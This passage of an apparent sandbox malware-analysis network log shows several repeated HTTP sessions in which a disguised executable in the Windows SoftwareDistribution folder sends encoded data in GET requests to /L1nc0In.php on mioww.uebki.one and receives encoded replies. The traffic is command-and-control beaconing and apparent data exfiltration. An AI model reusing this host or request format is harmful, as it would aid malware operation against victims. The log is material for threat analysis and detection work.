                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QbhMFihBkBVAjtAAggo6RwDe4TEtiT8sRaKQljNjStdsz9u65niahkOLS6Ttu6ia57cp7Uye7Cm%2BV%2BA2p0VgidnMCnjioSqKkA0Pv3f4DXxf4%2B%2BD%2BwdlB9oCNZfZC4izw0A%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8fef9bb34291-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              21 | 192.168.2.4 | 49758 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:13:41.921751976 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:13:42.664119959 CEST | 725 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:42 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pkiX3d9TcLe2Z2%2B6Cmzy54SihAlcpAo4ojXXPjZsIIAxDD8kKgBdcOsS0XKZRzga7GcwoA%2FfJ4gq9fBrTsubDjZ1UglJKU2VpJftgBayYrqnopoo31ieivcDxZit7C8dmmg%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb90138d430c86-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              22 | 192.168.2.4 | 49759 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:13:47.673547029 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:13:48.417118073 CEST | 729 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:48 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z1wPUyNXEQnNZFRpcI9ibc4uhp6BSsNvgKTGGqyS0%2F1mKFBw08yd94T4XhVxPXQqo1%2BgVhy%2F2iteCU6Sdb5jBReswApipQR4l%2Byq0xlv7nMupuFX90rjivJBH3VPyMcrm3c%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb90378bcf41fb-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              23 | 192.168.2.4 | 49760 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:13:53.443692923 CEST | 2107 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca= [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:13:54.173933029 CEST | 727 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:54 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oYVrft9me4oQ36dRlcPMJIFyZDx%2FIxDBt55FUtqhdG%2FdUbRfw7B9k7DRbJJUiwSWPV8Qefh3iW%2BEeyF7DLZjLUcImDGpCTNCS23TCs6pKlSZ6RAjwuO2Xr61HR3Zf0nsszU%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb905b89ad43d7-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              24 | 192.168.2.4 | 49761 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:13:59.189524889 CEST | 2107 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca= [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:13:59.916388988 CEST | 725 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:59 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BL%2BxqSV0jNNJdz35ewBQQ2SrDhFEbtEOp%2BhcLc2hNckl7KpmxAqOTHqp73BlF1TB3XtdEl2LqB65E6xPjIEhoIPVJhTouCjGfCsR8EF3K6Rk9djm47c3mXXO8nWfJkndgFU%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb907f89a64343-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              25 | 192.168.2.4 | 49762 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:14:04.937145948 CEST | 2131 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca= [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:14:05.668186903 CEST | 727 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:14:05 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bz6izVlXPDf%2BY57LPp9bG32W2VyQklhQYphI1a8pWUJqzb4wJRuumcIBpdt%2FaCYu2Mn8R9AwBSJD1ekC8YUVXCCTGRRnv7McfEjI2wL9rmvFPy5zNT29OtgU9FWI9Ca%2BWU8%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb90a35cd41a2c-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              26 | 192.168.2.4 | 49763 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:14:10.686887980 CEST | 2131 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca= [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:14:11.483720064 CEST | 729 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:14:11 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZnEzaSeKdpV%2BQ857Er3vT4b2uL47HaySEg2o40D3mpSYtKKOnvB8OPEsg6fyR5dEnSMQFB5WqItYjKm9ZV%2FDcOIlGt5bBWLoNPs%2Fa1L11t30CcrTHOBOOg%2FdV1BHYjFz9xY%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb90c7afc441ba-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              27 | 192.168.2.4 | 49764 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:14:16.505985975 CEST | 2107 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca= [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:14:17.249116898 CEST | 723 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:14:17 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LEQcmhnpGuSdsv3CmdjSPpYtnzP5AsyV7NtMQ4OKBc7FXGaNf3oCQiwY1sxhW8l5zmJ5U118FNLpkGX9n1wnm8awTFc7HcaiqNMbu0aQj7f27L5ne%2B6MjtJW0MLvOTZmIxQ%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb90ebbdb832e8-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              28 | 192.168.2.4 | 49765 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:14:22.265259981 CEST | 2104 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=d1nIiojIkNmMkNjZzM2MjZGO3MTO4EWNkVWYyQDZ4EzMzUjZjJmIsISO3IWYycjY2ADOmBjMiJDOhBzYzMWOjJWMklDM0IjZ4UDM1UDZ3IDNiojIxEjY0QGZzYmYxI2M4QDM1MzN3EWM0EGZkNTN0kjMlFmIsISNwgTZ1ADMihjZjFTNxQGMxkDZyMDOhlzMiJzY5QWOiFGNycjYhFmMiojI1kDZkNTYwYTNiVmM5QGOyMTY5QGMwYmMmZmM1cDOjNmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUa [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:14:22.996205091 CEST | 729 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:14:22 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X8HN1XOsvCj9CAGb8LCofX4wQOATBp14c6XDd6kEGGkTmUDLtrB796M43VZ%2B%2F1lMQkiQflfKbRYXR0BU0A%2BRWAA1i7FvexQt9axq8AoTtu2SiXABj42jUf%2BESi34ENgGIU4%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb910fafa78c8f-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              29 | 192.168.2.4 | 49766 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:14:28.015846014 CEST | 2131 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca= [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:14:28.572233915 CEST | 720 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:14:28 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
